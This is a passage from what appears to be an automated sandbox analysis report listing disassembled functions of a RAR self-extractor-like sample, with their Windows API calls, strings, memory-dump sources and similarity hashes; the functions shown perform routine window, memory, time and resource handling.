                                                                                            Function 00A49ED5 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • ShowWindow.USER32(?,00000000), ref: 00A49EEE
                                                                                            • GetWindowRect.USER32(?,00000000), ref: 00A49F44
                                                                                            • ShowWindow.USER32(?,00000005,00000000), ref: 00A49FDB
                                                                                            • SetWindowTextW.USER32(?,00000000), ref: 00A49FE3
                                                                                            • ShowWindow.USER32(00000000,00000005), ref: 00A49FF9
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: Window$Show$RectText
                                                                                            • String ID: RarHtmlClassName
                                                                                            • API String ID: 3937224194-1658105358
                                                                                            • Opcode ID: 8487b56c7a8d08cca0b382d3e7e0c69444f676b134c32c57b21bcc7af7909311
                                                                                            • Instruction ID: efd5513f552b845d26f955a2c98106392f2a5d58e286cbdeec235bffb0e8e7b4
                                                                                            • Opcode Fuzzy Hash: 8487b56c7a8d08cca0b382d3e7e0c69444f676b134c32c57b21bcc7af7909311
                                                                                            • Instruction Fuzzy Hash: 6041A236208210AFCF219FA59C49B6B7BB8FF88701F10465AF9469A166CB34DD19CB61
                                                                                            Function 00A49955 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 106COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: _wcslen
                                                                                            • String ID: $&nbsp;$<br>$<style>body{font-family:"Arial";font-size:12;}</style>
                                                                                            • API String ID: 176396367-3743748572
                                                                                            • Opcode ID: 764098d09696db440e19c214472308a1d30550dc2e00e73e517b5750f9634860
                                                                                            • Instruction ID: 3cf2593112e692bd74d4f3ae4d8cbf45afcd5e1cc3138aefd62e2051be0acf95
                                                                                            • Opcode Fuzzy Hash: 764098d09696db440e19c214472308a1d30550dc2e00e73e517b5750f9634860
                                                                                            • Instruction Fuzzy Hash: C1314C3A6443456ADA30AF549D42B7773E4FBD0360F50843EF886572C0FB64ADAA83A1
                                                                                            Function 00A5C8A4 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                              • Part of subcall function 00A5C868: _free.LIBCMT ref: 00A5C891
                                                                                            • _free.LIBCMT ref: 00A5C8F2
                                                                                              • Part of subcall function 00A58DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00A5C896,?,00000000,?,00000000,?,00A5C8BD,?,00000007,?,?,00A5CCBA,?), ref: 00A58DE2
                                                                                              • Part of subcall function 00A58DCC: GetLastError.KERNEL32(?,?,00A5C896,?,00000000,?,00000000,?,00A5C8BD,?,00000007,?,?,00A5CCBA,?,?), ref: 00A58DF4
                                                                                            • _free.LIBCMT ref: 00A5C8FD
                                                                                            • _free.LIBCMT ref: 00A5C908
                                                                                            • _free.LIBCMT ref: 00A5C95C
                                                                                            • _free.LIBCMT ref: 00A5C967
                                                                                            • _free.LIBCMT ref: 00A5C972
                                                                                            • _free.LIBCMT ref: 00A5C97D
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                                            • String ID:
                                                                                            • API String ID: 776569668-0
                                                                                            • Opcode ID: bf1448b5a367794c459becf00bdc5ad94e8d71ea07fb2ac2ae3d8aaabc3cc25b
                                                                                            • Instruction ID: dd66b3cb24e24f5af595d178f605cc2e3bc9033f890948332a053b15141b94d2
                                                                                            • Opcode Fuzzy Hash: bf1448b5a367794c459becf00bdc5ad94e8d71ea07fb2ac2ae3d8aaabc3cc25b
                                                                                            • Instruction Fuzzy Hash: F8110D72580B08AAE620B7B1CD07FCB7BECBF14B12F404C15FA9D66097DA79A5498750
                                                                                            Function 00A4E5EE Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 45libraryloaderCOMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,?,00A4E669,00A4E5CC,00A4E86D), ref: 00A4E605
                                                                                            • GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 00A4E61B
                                                                                            • GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 00A4E630
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressProc$HandleModule
                                                                                            • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
                                                                                            • API String ID: 667068680-1718035505
                                                                                            • Opcode ID: bfa5302e69c66c9bda43892cac442fe7435d95b1dbd4a5ecd08b68329dc633dd
                                                                                            • Instruction ID: 6704e384b3895f4386ea8ff6c1e17a2e6cc5f2e19c926d029134604c60ef9320
                                                                                            • Opcode Fuzzy Hash: bfa5302e69c66c9bda43892cac442fe7435d95b1dbd4a5ecd08b68329dc633dd
                                                                                            • Instruction Fuzzy Hash: 3AF0F63EB80262AB0F21CFF46C88966E2E87AA5741F03093ED902D3140EB60CC565B90
                                                                                            Function 00A4146A Relevance: 9.1, APIs: 6, Instructions: 98timeCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • SystemTimeToFileTime.KERNEL32(?,?), ref: 00A414C2
                                                                                              • Part of subcall function 00A3B146: GetVersionExW.KERNEL32(?), ref: 00A3B16B
                                                                                            • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00A414E6
                                                                                            • FileTimeToSystemTime.KERNEL32(?,?), ref: 00A41500
                                                                                            • TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?), ref: 00A41513
                                                                                            • SystemTimeToFileTime.KERNEL32(?,?), ref: 00A41523
                                                                                            • SystemTimeToFileTime.KERNEL32(?,?), ref: 00A41533
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: Time$File$System$Local$SpecificVersion
                                                                                            • String ID:
                                                                                            • API String ID: 2092733347-0
                                                                                            • Opcode ID: 0a8c5ec0d9c5eff1a50784882e01d0d467e1d1aa62517a13d83f90775e6814d6
                                                                                            • Instruction ID: c16644b88cd4e26a0920c6a42eb4b68128d572d9aacf125ac2ad0bda3b300167
                                                                                            • Opcode Fuzzy Hash: 0a8c5ec0d9c5eff1a50784882e01d0d467e1d1aa62517a13d83f90775e6814d6
                                                                                            • Instruction Fuzzy Hash: 3531E87A118345ABC704DFA8C88499BB7F8BF98714F004A1EF999C3210E770D549CBA6
                                                                                            Function 00A52AFA Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetLastError.KERNEL32(?,?,00A52AF1,00A502FC,00A4FA34), ref: 00A52B08
                                                                                            • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00A52B16
                                                                                            • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00A52B2F
                                                                                            • SetLastError.KERNEL32(00000000,00A52AF1,00A502FC,00A4FA34), ref: 00A52B81
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorLastValue___vcrt_
                                                                                            • String ID:
                                                                                            • API String ID: 3852720340-0
                                                                                            • Opcode ID: a4d252bc14f98153d519d12c65ef56ffc95b167d4358c0a7c4d0626958f1e7df
                                                                                            • Instruction ID: 70b011561b6c90cbb2bc8be33d9ace3ce5d31233e82681a9262625a5b07b1142
                                                                                            • Opcode Fuzzy Hash: a4d252bc14f98153d519d12c65ef56ffc95b167d4358c0a7c4d0626958f1e7df
                                                                                            • Instruction Fuzzy Hash: A501D4371083116EAE256BB47C85A262BB9FB527B77610739FD20950E1FFB15C0E9344
                                                                                            Function 00A597E5 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetLastError.KERNEL32(?,00A71030,00A54674,00A71030,?,?,00A53F73,00000050,?,00A71030,00000200), ref: 00A597E9
                                                                                            • _free.LIBCMT ref: 00A5981C
                                                                                            • _free.LIBCMT ref: 00A59844
                                                                                            • SetLastError.KERNEL32(00000000,?,00A71030,00000200), ref: 00A59851
                                                                                            • SetLastError.KERNEL32(00000000,?,00A71030,00000200), ref: 00A5985D
                                                                                            • _abort.LIBCMT ref: 00A59863
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorLast$_free$_abort
                                                                                            • String ID:
                                                                                            • API String ID: 3160817290-0
                                                                                            • Opcode ID: 9ef75ed02bebc33040389846b0c2f0cac988192884bf0e737083a4bea3c8e47c
                                                                                            • Instruction ID: 17f5c286e03e74325e0ca38d2546e361ff7f0c1076573acb1ae8fb109bf2a301
                                                                                            • Opcode Fuzzy Hash: 9ef75ed02bebc33040389846b0c2f0cac988192884bf0e737083a4bea3c8e47c
                                                                                            • Instruction Fuzzy Hash: 1EF0F437200A01B6CA1277647D0AA2B1AB9BFF2B23F250124FD25AA192EF70880F4161
                                                                                            Function 00A4DC3B Relevance: 9.0, APIs: 6, Instructions: 42windowsynchronizationCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • WaitForSingleObject.KERNEL32(?,0000000A), ref: 00A4DC47
                                                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00A4DC61
                                                                                            • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00A4DC72
                                                                                            • TranslateMessage.USER32(?), ref: 00A4DC7C
                                                                                            • DispatchMessageW.USER32(?), ref: 00A4DC86
                                                                                            • WaitForSingleObject.KERNEL32(?,0000000A), ref: 00A4DC91
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: Message$ObjectSingleWait$DispatchPeekTranslate
                                                                                            • String ID:
                                                                                            • API String ID: 2148572870-0
                                                                                            • Opcode ID: 1c64ee8723b57b162c7ab27d31eb25634604c65d408e49ee9b80ae8dddbc3d4c
                                                                                            • Instruction ID: 289ed6997c211ca4c49a6f2b9f303b68e07da5880ad838f19fabe5279907a268
                                                                                            • Opcode Fuzzy Hash: 1c64ee8723b57b162c7ab27d31eb25634604c65d408e49ee9b80ae8dddbc3d4c
                                                                                            • Instruction Fuzzy Hash: A2F01972A01219BACE20ABE5EC4DDCB7F7DEF42791B004012F50AE2060DA64864AC6A0
                                                                                            Function 00A3C0C5 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 148COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                              • Part of subcall function 00A405DA: _wcslen.LIBCMT ref: 00A405E0
                                                                                              • Part of subcall function 00A3B92D: _wcsrchr.LIBVCRUNTIME ref: 00A3B944
                                                                                            • _wcslen.LIBCMT ref: 00A3C197
                                                                                            • _wcslen.LIBCMT ref: 00A3C1DF
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: _wcslen$_wcsrchr
                                                                                            • String ID: .exe$.rar$.sfx
                                                                                            • API String ID: 3513545583-31770016
                                                                                            • Opcode ID: edd3f0af6f3fbb750e32de57e0fcf82251f66aec9cfc32902aa828c40a2f180a
                                                                                            • Instruction ID: 89b2cf2dc3e8c500dc9c7b7b4af0ed8857bf58da76c041fb7332ade4776ca180
                                                                                            • Opcode Fuzzy Hash: edd3f0af6f3fbb750e32de57e0fcf82251f66aec9cfc32902aa828c40a2f180a
                                                                                            • Instruction Fuzzy Hash: 36415A26540351A6C735AF749D52A7BB3B8EF81764F104A0FFAD27B181FB604D82E3A1
                                                                                            Function 00A4CE87 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 133COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetTempPathW.KERNEL32(00000800,?), ref: 00A4CE9D
                                                                                              • Part of subcall function 00A3B690: _wcslen.LIBCMT ref: 00A3B696
                                                                                            • _swprintf.LIBCMT ref: 00A4CED1
                                                                                              • Part of subcall function 00A34092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00A340A5
                                                                                            • SetDlgItemTextW.USER32(?,00000066,00A7946A), ref: 00A4CEF1
                                                                                            • EndDialog.USER32(?,00000001), ref: 00A4CFFE
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: DialogItemPathTempText__vswprintf_c_l_swprintf_wcslen
                                                                                            • String ID: %s%s%u
                                                                                            • API String ID: 110358324-1360425832
                                                                                            • Opcode ID: 179c16a3c9785350989a8b6752af76f3d5590ea9ad6b77b9b111d11e62cb4c19
                                                                                            • Instruction ID: 5d8ee0801a6958379fe363eb68325516b0db7c847a141dcfb43aaf1300c186d4
                                                                                            • Opcode Fuzzy Hash: 179c16a3c9785350989a8b6752af76f3d5590ea9ad6b77b9b111d11e62cb4c19
                                                                                            • Instruction Fuzzy Hash: EF4190B5900218AADF21DBA0CC45EEE77BCEB85315F4080A6FA0DE7051EF759A85CF61
                                                                                            Function 00A3BB03 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 127COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • _wcslen.LIBCMT ref: 00A3BB27
                                                                                            • GetCurrentDirectoryW.KERNEL32(000007FF,?,?,?,?,00000000,?,?,00A3A275,?,?,00000800,?,00A3A23A,?,00A3755C), ref: 00A3BBC5
                                                                                            • _wcslen.LIBCMT ref: 00A3BC3B
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: _wcslen$CurrentDirectory
                                                                                            • String ID: UNC$\\?\
                                                                                            • API String ID: 3341907918-253988292
                                                                                            • Opcode ID: 427094ad6c6cae00ae905751498f88d97cbd6ccc490699d4da9dc5b1f37c0d51
                                                                                            • Instruction ID: 2286a6a566d1d09c4309ba49c09db07eeedd8a777f8b1dc9bfca082935c9a838
                                                                                            • Opcode Fuzzy Hash: 427094ad6c6cae00ae905751498f88d97cbd6ccc490699d4da9dc5b1f37c0d51
                                                                                            • Instruction Fuzzy Hash: 3B41BF36410215BACF31AF60CD42EEA77BABF88390F008425FB54A3151EBB09E919A70
                                                                                            Function 00A4B6DD Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58windowCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • LoadBitmapW.USER32(00000065), ref: 00A4B6ED
                                                                                            • GetObjectW.GDI32(00000000,00000018,?), ref: 00A4B712
                                                                                            • DeleteObject.GDI32(00000000), ref: 00A4B744
                                                                                            • DeleteObject.GDI32(00000000), ref: 00A4B767
                                                                                              • Part of subcall function 00A4A6C2: FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,00A4B73D,00000066), ref: 00A4A6D5
                                                                                              • Part of subcall function 00A4A6C2: SizeofResource.KERNEL32(00000000,?,?,?,00A4B73D,00000066), ref: 00A4A6EC
                                                                                              • Part of subcall function 00A4A6C2: LoadResource.KERNEL32(00000000,?,?,?,00A4B73D,00000066), ref: 00A4A703
                                                                                              • Part of subcall function 00A4A6C2: LockResource.KERNEL32(00000000,?,?,?,00A4B73D,00000066), ref: 00A4A712
                                                                                              • Part of subcall function 00A4A6C2: GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,00A4B73D,00000066), ref: 00A4A72D
                                                                                              • Part of subcall function 00A4A6C2: GlobalLock.KERNEL32(00000000), ref: 00A4A73E
                                                                                              • Part of subcall function 00A4A6C2: CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 00A4A762
                                                                                              • Part of subcall function 00A4A6C2: GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 00A4A7A7
                                                                                              • Part of subcall function 00A4A6C2: GlobalUnlock.KERNEL32(00000000), ref: 00A4A7C6
                                                                                              • Part of subcall function 00A4A6C2: GlobalFree.KERNEL32(00000000), ref: 00A4A7CD
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: Global$Resource$Object$BitmapCreateDeleteLoadLock$AllocFindFreeFromGdipSizeofStreamUnlock
                                                                                            • String ID: ]
                                                                                            • API String ID: 1797374341-3352871620
                                                                                            • Opcode ID: 92a21d9f2258dfd89bc474b5f8fd5cdc38757e8df78e84772c8d3802e7b70ee8
                                                                                            • Instruction ID: e4f97f19462ad82930ec76f3052a327fbd0a021150d9c62d200dd5090d9b4149
                                                                                            • Opcode Fuzzy Hash: 92a21d9f2258dfd89bc474b5f8fd5cdc38757e8df78e84772c8d3802e7b70ee8
                                                                                            • Instruction Fuzzy Hash: 2201F93E641101A7CB11B7B45D09ABF7AB99FD0752F150011F900A7291DF31CD064272
                                                                                            Function 00A4D600 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 56COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                              • Part of subcall function 00A31316: GetDlgItem.USER32(00000000,00003021), ref: 00A3135A
                                                                                              • Part of subcall function 00A31316: SetWindowTextW.USER32(00000000,00A635F4), ref: 00A31370
                                                                                            • EndDialog.USER32(?,00000001), ref: 00A4D64B
                                                                                            • GetDlgItemTextW.USER32(?,00000068,00000800), ref: 00A4D661
                                                                                            • SetDlgItemTextW.USER32(?,00000066,?), ref: 00A4D675
                                                                                            • SetDlgItemTextW.USER32(?,00000068), ref: 00A4D684
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
